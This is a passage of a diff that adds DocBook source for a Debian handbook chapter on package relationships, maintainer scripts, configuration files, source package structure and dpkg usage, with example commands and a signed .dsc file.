+	  <emphasis role="pkg">mail-transport-agent</emphasis> virtual
+	  package. Thus, any package that needs this service to be
+	  functional (e.g. a mailing list manager, such as <emphasis role="pkg">smartlist</emphasis> or <emphasis role="pkg">sympa</emphasis>) simply states in its
+	  dependencies that it requires a <emphasis role="pkg">mail-transport-agent</emphasis> instead of
+	  specifying a large yet incomplete list of possible solutions
+          (e.g. <command>postfix | sendmail | exim4 | …</command>).
+          Furthermore, it is useless to install two mail
+	  servers on the same machine, which is why each of these
+	  packages declares a conflict with the <emphasis role="pkg">mail-transport-agent</emphasis> virtual
+	  package. A conflict between a package and itself is ignored
+	  by the system, but this technique will prohibit the
+	  installation of two mail servers side by side.</para>
+
+          <sidebar>
+            <title><emphasis>DEBIAN POLICY</emphasis> List of virtual packages</title>
+            <indexterm><primary>package</primary><secondary>virtual package</secondary></indexterm>
+
+	    <para>For virtual packages to be useful, everyone must agree on
+	    their name. This is why they are standardized in the Debian
+	    Policy. The list includes among others <emphasis role="pkg">mail-transport-agent</emphasis> for mail servers,
+	    <emphasis role="pkg">c-compiler</emphasis> for C programming
+	    language compilers, <emphasis role="pkg">www-browser</emphasis>
+	    for web browsers, <emphasis role="pkg">httpd</emphasis> for web
+	    servers, <emphasis role="pkg">ftp-server</emphasis> for FTP
+	    servers, <emphasis role="pkg">x-terminal-emulator</emphasis>
+	    for terminal emulators in graphical mode
+	    (<command>xterm</command>), and <emphasis role="pkg">x-window-manager</emphasis> for window
+	    managers.</para>
+
+	    <para>The full list can be found on the Web.
+	    <ulink type="block" url="http://www.debian.org/doc/packaging-manuals/virtual-package-names-list.txt" />
+	    </para>
+          </sidebar>
+        </section>
+        <section>
+          <title>Interchangeability with Another Package</title>
+
+	  <para>The <literal>Provides</literal> field is also interesting
+	  when the content of a package is included in a larger package.
+	  For example, the <emphasis role="pkg">libdigest-md5-perl</emphasis> Perl module was an
+	  optional module in Perl 5.6, and has been integrated as standard
+	  in Perl 5.8 (and later versions, such as 5.24 present in
+	  <emphasis role="distribution">Stretch</emphasis>). As such, the
+	  package <emphasis role="pkg">perl</emphasis> has since version
+	  5.8 declared <literal>Provides: libdigest-md5-perl</literal> so
+	  that the dependencies on this package are met if the user has
+	  Perl 5.8 (or newer). The <emphasis role="pkg">libdigest-md5-perl</emphasis> package itself has
+	  eventually been deleted, since it no longer had any purpose when
+	  old Perl versions were removed.</para>
+
+          <figure>
+            <title>Use of a <literal>Provides</literal> field in order to not break dependencies</title>
+            <mediaobject>
+              <imageobject>
+                <imagedata fileref="images/virtual-package.png" width="50%" />
+              </imageobject>
+            </mediaobject>
+          </figure>
+
+	  <para>This feature is very useful, since it is never possible to
+	  anticipate the vagaries of development, and it is necessary to be
+	  able to adjust to renaming, and other automatic replacement, of
+	  obsolete software.</para>
+
+          <sidebar>
+            <title><emphasis>BACK TO BASICS</emphasis> Perl, a programming language</title>
+            <indexterm><primary>Perl</primary></indexterm>
+            <indexterm><primary>CPAN</primary></indexterm>
+
+	    <para>Perl (Practical Extraction and Report Language) is a very
+	    popular programming language. It has many ready-to-use modules
+	    that cover a vast spectrum of applications, and that are
+	    distributed by the CPAN (Comprehensive Perl Archive Network)
+	    servers, an exhaustive network of Perl packages.
+	    <ulink type="block" url="http://www.perl.org/" />
+	    <ulink type="block" url="http://www.cpan.org/" /></para>
+
+	    <para>Since it is an interpreted language, a program written in
+	    Perl does not require compilation prior to execution. This is
+	    why they are called “Perl scripts”.</para>
+          </sidebar>
+        </section>
+        <section>
+          <title>Past Limitations</title>
+
+	  <para>Virtual packages used to suffer from some limitations,
+	  the most significant of which was the absence of a version
+	  number. To return to the previous example, a dependency such
+	  as <literal>Depends: libdigest-md5-perl (&gt;=
+	  1.6)</literal>, despite the presence of Perl 5.10, would
+	  never be considered as satisfied by the packaging system —
+	  while in fact it most likely is satisfied. Unaware of this,
+	  the package system chose the least risky option, assuming
+	  that the versions do not match.</para>
+
+          <para>This limitation has been lifted in <emphasis role="pkg">dpkg</emphasis> 1.17.11, and is no longer
+          relevant in Stretch. Packages can assign a version
+          to the virtual packages they provide with a
+          dependency such as <literal>Provides: libdigest-md5-perl (=
+          1.8)</literal>.
+          </para>
+        </section>
+      </section>
+
+      <section>
+        <title>Replacing Files: The <literal>Replaces</literal> Field</title>
+        <indexterm><primary>replacement</primary></indexterm>
+        <indexterm><primary><literal>Replaces</literal>, header field</primary></indexterm>
+        <indexterm><primary>package</primary><secondary>replacement</secondary></indexterm>
+
+	<para>The <literal>Replaces</literal> field indicates that the
+	package contains files that are also present in another
+	package, but that the package is legitimately entitled to
+	replace them.  Without this specification,
+	<command>dpkg</command> fails, stating that it can not
+	overwrite the files of another package (technically, it is
+	possible to force it to do so with the
+	<literal>--force-overwrite</literal> option, but that is not
+	considered standard operation). This allows identification of
+	potential problems and requires the maintainer to study the
+	matter prior to choosing whether to add such a field.</para>
+
+	<para>The use of this field is justified when package names change
+	or when a package is included in another. This also happens when
+	the maintainer decides to distribute files differently among
+	various binary packages produced from the same source package: a
+	replaced file no longer belongs to the old package, but only to the
+	new one.</para>
+
+	<para>If all of the files in an installed package have been
+	replaced, the package is considered to be removed. Finally, this
+	field also encourages <command>dpkg</command> to remove the
+	replaced package where there is a conflict.</para>
+
+        <sidebar id="sidebar.debtags">
+          <title><emphasis>GOING FURTHER</emphasis> The <literal>Tag</literal> field</title>
+
+	  <para>In the <emphasis role="pkg">apt</emphasis> example above,
+	  we can see the presence of a field that we have not yet
+	  described, the <literal>Tag</literal> field. This field does not
+	  describe a relationship between packages, but is simply a way of
+	  categorizing a package in a thematic taxonomy. This
+	  classification of packages according to several criteria (type of
+	  interface, programming language, domain of application, etc.) has
+	  been available for a long time. Despite this, not all packages have
+	  accurate tags and it is not yet
+	  integrated in all Debian tools; <command>aptitude</command>
+	  displays these tags, and allows them to be used as search
+	  criteria. For those who are repelled by
+	  <command>aptitude</command>'s search criteria, the following website
+	  allows navigation of the tag database:
+	  <ulink type="block" url="https://wiki.debian.org/Debtags" />
+	  </para>
+        </sidebar>
+      </section>
+    </section>
+    <section id="sect.configuration-scripts">
+      <title>Configuration Scripts</title>
+      <indexterm><primary><filename>postinst</filename></primary></indexterm>
+      <indexterm><primary><filename>preinst</filename></primary></indexterm>
+      <indexterm><primary><filename>postrm</filename></primary></indexterm>
+      <indexterm><primary><filename>prerm</filename></primary></indexterm>
+      <indexterm><primary><filename>control.tar.gz</filename></primary></indexterm>
+
+      <para>In addition to the <filename>control</filename> file, the
+      <filename>control.tar.gz</filename> archive for each Debian package
+      may contain a number of scripts, called by <command>dpkg</command> at
+      different stages in the processing of a package. The Debian Policy
+      describes the possible cases in detail, specifying the scripts called
+      and the arguments that they receive. These sequences may be
+      complicated, since if one of the scripts fails,
+      <command>dpkg</command> will try to return to a satisfactory state by
+      canceling the installation or removal in progress (insofar as it is
+      possible).</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> <command>dpkg</command>'s database</title>
+        <indexterm><primary><filename>/var/lib/dpkg/</filename></primary></indexterm>
+	<indexterm><primary>dpkg</primary><secondary>database</secondary></indexterm>
+
+	<para>All of the configuration scripts for installed packages are
+	stored in the <filename>/var/lib/dpkg/info/</filename> directory,
+	in the form of a file prefixed with the package's name. This
+	directory also includes a file with the <filename>.list</filename>
+	extension for each package, containing the list of files that
+	belong to that package.</para>
+
+	<para>The <filename>/var/lib/dpkg/status</filename> file contains a
+	series of data blocks (in the format of the famous mail headers,
+	RFC 2822) describing the status of each package. The information
+	from the <filename>control</filename> file of the installed
+	packages is also replicated there.</para>
+      </sidebar>
+
+      <para>In general, the <filename>preinst</filename> script is executed
+      prior to installation of the package, while the
+      <filename>postinst</filename> follows it. Likewise,
+      <filename>prerm</filename> is invoked before removal of a package and
+      <filename>postrm</filename> afterwards. An update of a package is
+      equivalent to removal of the previous version and installation of the
+      new one. It is not possible to describe in detail all the possible
+      scenarios here, but we will discuss the most common two: an
+      installation/update and a removal.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Symbolic names of the scripts</title>
+
+	<para>The sequences described in this section call configuration
+	scripts by specific names, such as <command>old-prerm</command> or
+	<command>new-postinst</command>. They are, respectively, the
+	<command>prerm</command> script contained in the old version of the
+	package (installed before the update) and the
+	<command>postinst</command> script contained in the new version
+	(installed by the update).</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> State diagrams</title>
+
+	<para>Manoj Srivastava made these diagrams explaining how the
+	configuration scripts are called by <command>dpkg</command>.
+	Similar diagrams have also been developed by the Debian Women
+	project; they are a bit simpler to understand, but less complete.
+	<ulink type="block" url="https://people.debian.org/~srivasta/MaintainerScripts.html" />
+	<ulink type="block" url="https://www.debian.org/doc/debian-policy/#maintainer-script-flowcharts" /></para>
+      </sidebar>
+      <section>
+        <title>Installation and Upgrade</title>
+        <indexterm><primary><command>dpkg</command></primary><secondary>internal operation</secondary></indexterm>
+
+	<para>Here is what happens during an installation (or an
+	update):</para>
+        <orderedlist>
+          <listitem>
+	    <para>For an update, <command>dpkg</command> calls the
+	    <command>old-prerm upgrade
+	    <replaceable>new-version</replaceable></command>.</para>
+          </listitem>
+          <listitem>
+	    <para>Still for an update, <command>dpkg</command> then
+	    executes <command>new-preinst
+	    upgrade <replaceable>old-version</replaceable></command>; for a
+	    first installation, it executes <command>new-preinst
+	    install</command>. It may add the old version in the last
+	    parameter, if the package has already been installed and
+	    removed since (but not purged, the configuration files having
+	    been retained).</para>
+          </listitem>
+          <listitem>
+	    <para>The new package files are then unpacked. If a file
+	    already exists, it is replaced, but a backup copy is
+	    temporarily made.</para>
+          </listitem>
+          <listitem>
+	    <para>For an update, <command>dpkg</command> executes
+	    <command>old-postrm upgrade
+	    <replaceable>new-version</replaceable></command>.</para>
+          </listitem>
+          <listitem>
+	    <para><command>dpkg</command> updates all of the internal data
+	    (file list, configuration scripts, etc.) and removes the
+	    backups of the replaced files. This is the point of no return:
+	    <command>dpkg</command> no longer has access to all of the
+	    elements necessary to return to the previous state.</para>
+          </listitem>
+          <listitem>
+	    <para><command>dpkg</command> will update the configuration
+	    files, asking the user to decide if it is unable to
+	    automatically manage this task. The details of this procedure
+	    are discussed in <xref linkend="sect.conffiles" />.</para>
+          </listitem>
+          <listitem>
+	    <para>Finally, <command>dpkg</command> configures the package
+	    by executing <command>new-postinst configure
+	    <replaceable>last-version-configured</replaceable></command>.</para>
+          </listitem>
+        </orderedlist>
+      </section>
+      <section>
+        <title>Package Removal</title>
+
+	<para>Here is what happens during a package removal:</para>
+        <orderedlist>
+          <listitem>
+	    <para><command>dpkg</command> calls <command>prerm
+	    remove</command>.</para>
+          </listitem>
+          <listitem>
+	    <para><command>dpkg</command> removes all of the package's
+	    files, with the exception of the configuration files and
+	    configuration scripts.</para>
+          </listitem>
+          <listitem>
+	    <para><command>dpkg</command> executes <command>postrm
+	    remove</command>. All of the configuration scripts, except
+	    <filename>postrm</filename>, are removed. If the user has not
+	    used the “purge” option, the process stops here.</para>
+          </listitem>
+          <listitem>
+	    <para>For a complete purge of the package (command issued with
+	    <command>dpkg --purge</command> or <command>dpkg -P</command>),
+	    the configuration files are also deleted, as well as a certain
+	    number of copies (<filename>*.dpkg-tmp</filename>,
+	    <filename>*.dpkg-old</filename>,
+	    <filename>*.dpkg-new</filename>) and temporary files;
+	    <command>dpkg</command> then executes <command>postrm
+	    purge</command>.</para>
+          </listitem>
+        </orderedlist>
+
+        <sidebar>
+          <title><emphasis>VOCABULARY</emphasis> Purge, a complete removal</title>
+          <indexterm><primary>purge of a package</primary></indexterm>
+
+	  <para>When a Debian package is removed, the configuration files
+	  are retained in order to facilitate possible re-installation.
+	  Likewise, the data generated by a daemon (such as the content of
+	  an LDAP server directory, or the content of a database for an SQL
+	  server) are usually retained.</para>
+
+	  <para>To remove all data associated with a package, it is
+	  necessary to “purge” the package with the command,
+	  <command>dpkg -P <replaceable>package</replaceable></command>,
+	  <command>apt-get remove --purge
+	  <replaceable>package</replaceable></command> or <command>aptitude
+	  purge <replaceable>package</replaceable></command>.</para>
+
+	  <para>Given the definitive nature of such data removals, a
+	  purge should not be taken lightly.</para>
+        </sidebar>
+
+        <indexterm><primary><filename>config</filename>, <command>debconf</command> script</primary></indexterm>
+
+	<para>The four scripts detailed above are complemented by a
+	<filename>config</filename> script, provided by packages using
+	<command>debconf</command> to acquire information from the user for
+	configuration. During installation, this script defines in detail
+	the questions asked by <command>debconf</command>. The responses
+	are recorded in the <command>debconf</command> database for future
+	reference. The script is generally executed by
+	<command>apt</command> prior to installing packages one by one in
+	order to group all the questions and ask them all to the user at
+	the beginning of the process. The pre- and post-installation
+	scripts can then use this information to operate according to the
+	user's wishes.</para>
+
+        <sidebar>
+          <title><emphasis>TOOL</emphasis> <command>debconf</command></title>
+          <indexterm><primary><command>debconf</command></primary></indexterm>
+
+	  <para><command>debconf</command> was created to resolve a
+	  recurring problem in Debian. All Debian packages unable to
+	  function without a minimum of configuration used to ask questions
+	  with calls to the <command>echo</command> and
+	  <command>read</command> commands in <filename>postinst</filename>
+	  shell scripts (and other similar scripts). But this also
+	  means that during a large installation or update the user must
+	  stay with their computer to respond to various questions that may
+	  arise at any time. These manual interactions have now been almost
+	  entirely dispensed with, thanks to the <command>debconf</command>
+	  tool.</para>
+
+	  <para><command>debconf</command> has many interesting features:
+	  it requires the developer to specify user interaction; it allows
+	  localization of all the strings displayed to users (all
+	  translations are stored in the <filename>templates</filename>
+	  file describing the interactions); it has different frontends
+	  to display the questions to the user (text mode,
+	  graphical mode, non-interactive); and it allows creation of a
+	  central database of responses to share the same configuration
+	  with several computers... but the most important is that it is
+	  now possible to present all of the questions in a row to the user, 
+	  prior to starting a long installation or update process. The
+	  user can go about their business while the system handles the
+	  installation on its own, without having to stay there staring at
+	  the screen waiting for questions.</para>
+        </sidebar>
+      </section>
+    </section>
+    <section id="sect.conffiles">
+      <title>Checksums, List of Configuration Files</title>
+      <indexterm><primary><filename>md5sums</filename></primary></indexterm>
+      <indexterm><primary><filename>conffiles</filename></primary></indexterm>
+      <indexterm><primary>checksums</primary></indexterm>
+      <indexterm><primary>files</primary><secondary>configuration files</secondary></indexterm>
+      <indexterm><primary>configuration</primary><secondary>files</secondary></indexterm>
+
+      <para>In addition to the maintainer scripts and control data already
+      mentioned in the previous sections, the
+      <filename>control.tar.gz</filename> archive of a Debian package may
+      contain other interesting files. The first,
+      <filename>md5sums</filename>, contains the MD5 checksums for all of
+      the package's files. Its main advantage is that it allows
+      <command>dpkg --verify</command> (which we will study in <xref linkend="sect.dpkg-verify" />) to check if these files have been
+      modified since their installation. Note that when this file doesn't
+      exist, <command>dpkg</command> will generate it dynamically at
+      installation time (and store it in the dpkg database just like other
+      control files).</para>
+
+      <para><filename>conffiles</filename> lists package files that must
+      be handled as configuration files. Configuration files can be
+      modified by the administrator, and <command>dpkg</command> will try
+      to preserve those changes during a package update.</para>
+
+      <para>In effect, in this situation, <command>dpkg</command> behaves
+      as intelligently as possible: if the standard configuration file has
+      not changed between the two versions, it does nothing. If, however,
+      the file has changed, it will try to update this file. Two cases are
+      possible: either the administrator has not touched this configuration
+      file, in which case <command>dpkg</command> automatically installs
+      the new version; or the file has been modified, in which case
+      <command>dpkg</command> asks the administrator which version they
+      wish to use (the old one with modifications, or the new one provided
+      with the package). To assist in making this decision,
+      <command>dpkg</command> offers to display a
+      “<command>diff</command>” that shows the difference between the
+      two versions. If the user chooses to retain the old version, the new
+      one will be stored in the same location in a file with the
+      <filename>.dpkg-dist</filename> suffix. If the user chooses the new
+      version, the old one is retained in a file with the
+      <filename>.dpkg-old</filename> suffix. Another available action
+      consists of momentarily interrupting <command>dpkg</command> to edit
+      the file and attempt to re-instate the relevant modifications
+      (previously identified with <command>diff</command>).</para>
+
+      <sidebar id="sidebar.questions-conffiles">
+        <title><emphasis>GOING FURTHER</emphasis> Avoiding the configuration file questions</title>
+
+	<para><command>dpkg</command> handles configuration file updates,
+	but, while doing so, regularly interrupts its work to ask for input from the
+	administrator. This makes it less than enjoyable for those who wish
+	to run updates in a non-interactive manner. This is why this
+	program offers options that allow the system to respond
+	automatically according to the same logic:
+	<command>--force-confold</command> retains the old version of the
+	file; <command>--force-confnew</command> will use the new version of
+	the file (these choices are respected, even if the file has not
+	been changed by the administrator, which only rarely has the
+	desired effect). Adding the <command>--force-confdef</command>
+	option tells <command>dpkg</command> to decide by itself when
+	possible (in other words, when the original
+	configuration file has not been touched), and only uses
+	<command>--force-confnew</command> or
+	<command>--force-confold</command> for other cases.</para>
+
+	<para>These options apply to <command>dpkg</command>, but most of
+	the time the administrator will work directly with the
+	<command>aptitude</command> or <command>apt-get</command> programs.
+	It is, thus, necessary to know the syntax used to indicate the
+	options to pass to the <command>dpkg</command> command (their
+	command line interfaces are very similar).</para>
+
+        <screen>
+<computeroutput># </computeroutput><userinput>apt -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" full-upgrade</userinput>
+</screen>
+
+	<para>These options can be stored directly in <command>apt</command>'s
+	configuration. To do so, simply write the following line
+	in the <filename>/etc/apt/apt.conf.d/local</filename> file:</para>
+        <informalexample>
+          <programlisting>
+DPkg::options { "--force-confdef"; "--force-confold"; }
+</programlisting>
+        </informalexample>
+
+	<para>Including this option in the configuration file means that it
+	will also be used in a graphical interface such as
+	<command>aptitude</command>.</para>
+      </sidebar>
+
+      <sidebar id="sidebar.questions-conffiles-bis">
+        <title><emphasis>GOING FURTHER</emphasis> Force dpkg to ask configuration file questions</title>
+
+	<para>The <command>--force-confask</command> option requires
+	<command>dpkg</command> to display the questions about the
+	configuration files, even in cases where they would not normally be
+	necessary. Thus, when reinstalling a package with this option,
+	<command>dpkg</command> will ask the questions again for all of the
+	configuration files modified by the administrator. This is very
+	convenient, especially for reinstalling the original configuration
+	file if it has been deleted and no other copy is available: a
+	normal re-installation won't work, because <command>dpkg</command>
+	considers removal as a form of legitimate modification, and, thus,
+	doesn't install the desired configuration file.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.source-package-structure">
+    <title>Structure of a Source Package</title>
+    <indexterm><primary>package</primary><secondary>source package</secondary></indexterm>
+    <indexterm><primary>source</primary><secondary>package</secondary></indexterm>
+    <section>
+      <title>Format</title>
+      <indexterm><primary>DSC file</primary></indexterm>
+      <indexterm><primary><filename>diff.gz</filename> file</primary></indexterm>
+      <indexterm><primary><filename>debian.tar.gz</filename> file</primary></indexterm>
+      <indexterm><primary><filename>orig.tar.gz</filename> file</primary></indexterm>
+
+      <para>A source package is usually comprised of three files, a
+      <filename>.dsc</filename>, a <filename>.orig.tar.gz</filename>, and a
+      <filename>.debian.tar.xz</filename> (or <filename>.diff.gz</filename>).
+      They allow creation of binary packages (<filename>.deb</filename>
+      files described above) from the source code files of the program,
+      which are written in a programming language.</para>
+
+      <para>The <filename>.dsc</filename> (Debian Source Control) file is a
+      short text file containing an RFC 2822 header (just like the
+      <filename>control</filename> file studied in <xref linkend="sect.control" />) which describes the source package and
+      indicates which other files are part thereof. It is signed by its
+      maintainer, which guarantees authenticity. See <xref linkend="sect.package-authentication" /> for further details on this
+      subject.</para>
+
+      <example>
+        <title>A <filename>.dsc</filename> file</title>
+
+        <programlisting>
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+Format: 3.0 (quilt)
+Source: zim
+Binary: zim
+Architecture: all
+Version: 0.65-4
+Maintainer: Emfox Zhou &lt;emfox@debian.org&gt;
+Uploaders: Raphaël Hertzog &lt;hertzog@debian.org&gt;
+Homepage: http://zim-wiki.org
+Standards-Version: 3.9.8
+Vcs-Browser: https://anonscm.debian.org/cgit/collab-maint/zim.git
+Vcs-Git: https://anonscm.debian.org/git/collab-maint/zim.git
+Build-Depends: debhelper (&gt;= 9), xdg-utils, python (&gt;= 2.6.6-3~), libgtk2.0-0 (&gt;= 2.6), python-gtk2, python-xdg, dh-python
+Package-List:
+ zim deb x11 optional arch=all
+Checksums-Sha1:
+ 4a9be85c98b7f4397800f6d301428d64241034ce 1899614 zim_0.65.orig.tar.gz
+ 0ec38c990ec7662205dd0c843bf81f9033906a2e 10332 zim_0.65-4.debian.tar.xz
+Checksums-Sha256:
+ 5442f3334395a2beafc5b9a2bbec2e53e38270d4bad696b5c4053dd51dc1ed96 1899614 zim_0.65.orig.tar.gz
+ 78271df16aa166dce916b3ff4ecd705ed3a8832e49d3ef0bd8738a4fe8dd2b4f 10332 zim_0.65-4.debian.tar.xz
+Files:
+ 63ab7a2070e6d1d3fb32700a851d7b8b 1899614 zim_0.65.orig.tar.gz
+ 648559b38e04eaf4f6caa97563c057ff 10332 zim_0.65-4.debian.tar.xz
+
+-----BEGIN PGP SIGNATURE-----
+Comment: Signed by Raphael Hertzog
+
+iQEzBAEBCgAdFiEE1823g1EQnhJ1LsbSA4gdq+vCmrkFAlgzZXkACgkQA4gdq+vC
+mrnyXAf+M/PzZFjqk6Hvv1QSbocIDZ3bEqRjVpNLApubsPsEZZT6yw9vypzNE2hZ
+/BbLPa0Ntbhew4U+SJpuujV7VnLs9mZgOFuKRHKWYQBQ+oxw+gtM6iePwVj58aP/
+LW7K5gE428ohMdjIkf42Lz4Fve3dVPgPLIzQxRZ87N6OKqmS81M6/RRIF3TS/gJp
+CwpN1yifCfQs46gxL5/CgA4uhI8taz+g+8ZDd6fL5BQeFuNsgplY4QL1uGno3F7G
+VY7WZhM601Re2ePnv+6vjh8kDWMjZhfB4RJy0+hHezuoVGKljyaxc1O4P/fxvXus
+CEETju6cAE/HgDubDXDqExMwEd4odA==
+=HUvj
+-----END PGP SIGNATURE----- </programlisting>
+      </example>
+
+      <indexterm><primary><literal>Build-Depends</literal>, header field</primary></indexterm>
+
+      <para>Note that the source package also has dependencies
+      (<literal>Build-Depends</literal>) completely distinct from those of
+      binary packages, since they indicate tools required to compile the
+      software in question and construct its binary package.</para>
+
+      <sidebar>
+        <title><emphasis>CAUTION</emphasis> Distinct namespaces</title>
+
+	<para>It is important to note here that there is no required
+	correspondence between the name of the source package and that of
+	the binary package(s) that it generates. It is easy enough to
+	understand if you know that each source package may generate
+	several binary packages. This is why the <filename>.dsc</filename>
+	file has the <literal>Source</literal> and
+	<literal>Binary</literal> fields to explicitly name the source package and
+	store the list of binary packages that it generates.</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> Why divide into several packages</title>
+
+	<para>Quite frequently, a source package (for a given software)
+	can generate several binary packages. The split is justified by
+	the possibility to use (parts of) the software in different contexts.
+	Consider a 
+	shared library, it may be installed to make an application work (for
+	example, <emphasis role="pkg">libc6</emphasis>), or it can be
+	installed to develop a new program (<emphasis role="pkg">libc6-dev</emphasis> will then be the correct package).
+	We find the same logic for client/server services where we want to
+	install the server part on one machine and the client part on
+	others (this is the case, for example, of <emphasis role="pkg">openssh-server</emphasis> and <emphasis role="pkg">openssh-client</emphasis>).</para>
+
+	<para>Just as frequently, the documentation is provided in a
+	dedicated package: the user may install it independently from the
+	software, and may at any time choose to remove it to save disk
+	space. Additionally, this also saves disk space on the Debian
+	mirrors, since the documentation package will be shared amongst all
+	of the architectures (instead of having the documentation
+	duplicated in the packages for each architecture).</para>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>PERSPECTIVE</emphasis> Different source package formats</title>
+
+	<para>Originally there was only one source package format. This is
+	the <literal>1.0</literal> format, which associates an
+	<filename>.orig.tar.gz</filename> archive to a
+	<filename>.diff.gz</filename> “debianization” patch (there is
+	also a variant, consisting of a single <filename>.tar.gz</filename>
+	archive, which is automatically used if no
+	<filename>.orig.tar.gz</filename> is available).</para>
+
+	<para>Since Debian <emphasis role="distribution">Squeeze</emphasis>, Debian developers have the
+	option to use new formats that correct many problems of the
+	historical format. Format <literal>3.0 (quilt)</literal> can
+	combine multiple upstream archives in the same source package: in
+	addition to the usual <filename>.orig.tar.gz</filename>,
+	supplementary
+	<filename>.orig-<replaceable>component</replaceable>.tar.gz</filename>
+	archives can be included. This is useful with software that is distributed in
+	several upstream components but for which a single source package
+	is desired. These archives can also be compressed with
+        <command>xz</command> rather than
+        <command>gzip</command>, which saves disk space and network resources. Finally,
+	the monolithic patch, <filename>.diff.gz</filename> is replaced by
+	a <filename>.debian.tar.xz</filename> archive containing the
+	compiling instructions and a set of upstream patches contributed by
+	the package maintainer. These last are recorded in a format
+	compatible with <command>quilt</command> — a tool that facilitates
+	the management of a series of patches.</para>
+      </sidebar>
+
+      <para>The <filename>.orig.tar.gz</filename> file is an archive containing
+      the source code as provided by the original developer.
+      Debian package maintainers are asked to not modify this archive in order to be able
+      to easily check the origin and integrity of the file (by simple
+      comparison with a checksum) and to respect the wishes of some
+      authors.</para>
+
+      <para>The <filename>.debian.tar.xz</filename> contains all of the
+      modifications made by the Debian maintainer, especially the addition
+      of a <filename>debian</filename> directory containing the instructions to
+      execute to construct a Debian package.</para>
+
+      <sidebar>
+        <title><emphasis>TOOL</emphasis> Decompressing a source package</title>
+        <indexterm><primary><command>dpkg-source</command></primary></indexterm>
+	<indexterm><primary>decompressing, source package</primary></indexterm>
+	<indexterm><primary>uncompressing, source package</primary></indexterm>
+	<indexterm><primary>unpacking</primary><secondary>source package</secondary></indexterm>
+
+	<para>If you have a source package, you can use the
+	<command>dpkg-source</command> command (from the
+	<emphasis role="pkg">dpkg-dev</emphasis> package) to decompress it:</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>dpkg-source -x package_0.7-1.dsc</userinput>
+</screen>
+
+	<para>You can also use <command>apt-get</command> to download a
+	source package and unpack it right away. It requires that the
+	appropriate <literal>deb-src</literal> lines be present in the
+	<filename>/etc/apt/sources.list</filename> file, however (for
+	further details, see <xref linkend="sect.apt-sources.list" />).
+	These are used to list the “sources” of source packages
+	(meaning the servers on which a group of source packages are
+	hosted).</para>
+
+        <screen><computeroutput>$ </computeroutput><userinput>apt-get source <replaceable>package</replaceable></userinput>
+</screen>
+      </sidebar>
+    </section>
+    <section>
+      <title>Usage within Debian</title>
+
+      <para>The source package is the foundation of everything in Debian.
+      All Debian packages come from a source package, and each modification
+      in a Debian package is the consequence of a modification made to the
+      source package. The Debian maintainers work with the source package,
+      knowing, however, the consequences of their actions on the binary
+      packages. The fruits of their labors are thus found in the source
+      packages available from Debian: you can easily go back to them and
+      everything stems from them.</para>
+
+      <para>When a new version of a package (source package and one or more
+      binary packages) arrives on the Debian server, the source package is
+      the most important. Indeed, it will then be used by a network of
+      machines of different architectures for compilation on the various
+      architectures supported by Debian. The fact that the developer also
+      sends one or more binary packages for a given architecture (usually
+      i386 or amd64) is relatively unimportant, since these could just as
+      well have been automatically generated.</para>
+    </section>
+  </section>
+  <section id="sect.manipulating-packages-with-dpkg">
+    <title>Manipulating Packages with <command>dpkg</command></title>
+    <indexterm><primary><command>dpkg</command></primary></indexterm>
+
+    <para><command>dpkg</command> is the base command for handling Debian
+    packages on the system. If you have <filename>.deb</filename> packages,
+    it is <command>dpkg</command> that allows installation or analysis of
+    their contents. But this program only has a partial view of the Debian
+    universe: it knows what is installed on the system, and whatever it is
+    given on the command line, but knows nothing of the other available
+    packages. As such, it will fail if a dependency is not met. Tools such
+    as <command>apt</command>, on the contrary, will create a list of
+    dependencies to install everything as automatically as possible.</para>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> <command>dpkg</command> or <command>apt</command>?</title>
+
+      <para><command>dpkg</command> should be seen as a system tool
+      (backend), and <command>apt</command> as a tool closer to the
+      user, which overcomes the limitations of the former. These tools work
+      together, each one with its particularities, suited to specific
+      tasks.</para>
+    </sidebar>
+    <section>
+      <title>Installing Packages</title>
+      <indexterm><primary>installation</primary><secondary>package installation</secondary></indexterm>
+      <indexterm><primary>package</primary><secondary>installation</secondary></indexterm>
+
+      <para><command>dpkg</command> is, above all, the tool for installing an
+      already available Debian package (because it does not download
+      anything). To do this, we use its <literal>-i</literal> or
+      <literal>--install</literal> option.</para>
+
+      <example>
+        <title>Installation of a package with <command>dpkg</command></title>
+
+        <screen role="scale">
+<computeroutput># </computeroutput><userinput>dpkg -i man-db_2.7.6.1-2_amd64.deb</userinput>
+<computeroutput>(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-1) ...
+Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+Processing triggers for mime-support (3.60) ...</computeroutput>
+</screen>
+      </example>
+
+      <para>We can see the different steps performed by
+      <command>dpkg</command>; we know, thus, at what point any error may
+      have occurred. The installation can also be effected in two stages:
+      first unpacking, then configuration. <command>apt-get</command> takes
+      advantage of this, limiting the number of calls to
+      <command>dpkg</command> (since each call is costly, due to loading of
+      the database in memory, especially the list of already installed
+      files).</para>
+
+      <example>
+        <title>Separate unpacking and configuration</title>
+
+        <screen role="scale">
+<computeroutput># </computeroutput><userinput>dpkg --unpack man-db_2.7.6.1-2_amd64.deb</userinput>
+<computeroutput>(Reading database ... 110431 files and directories currently installed.)
+Preparing to unpack man-db_2.7.6.1-2_amd64.deb ...
+Unpacking man-db (2.7.6.1-2) over (2.7.6.1-2) ...
+Processing triggers for mime-support (3.60) ...
+# </computeroutput><userinput>dpkg --configure man-db</userinput>
+<computeroutput>Setting up man-db (2.7.6.1-2) ...
+Updating database of manual pages ...
+</computeroutput>
+</screen>
+      </example>
+      <indexterm><primary>package</primary><secondary>unpacking</secondary></indexterm>
+      <indexterm><primary>unpacking</primary><secondary>binary package</secondary></indexterm>
+
+      <para>Sometimes <command>dpkg</command> will fail to install a
+      package and return an error; if the user orders it to ignore this, it
+      will only issue a warning; it is for this reason that we have the
+      different <literal>--force-*</literal> options. The <command>dpkg
+      --force-help</command> command, or documentation of this command,
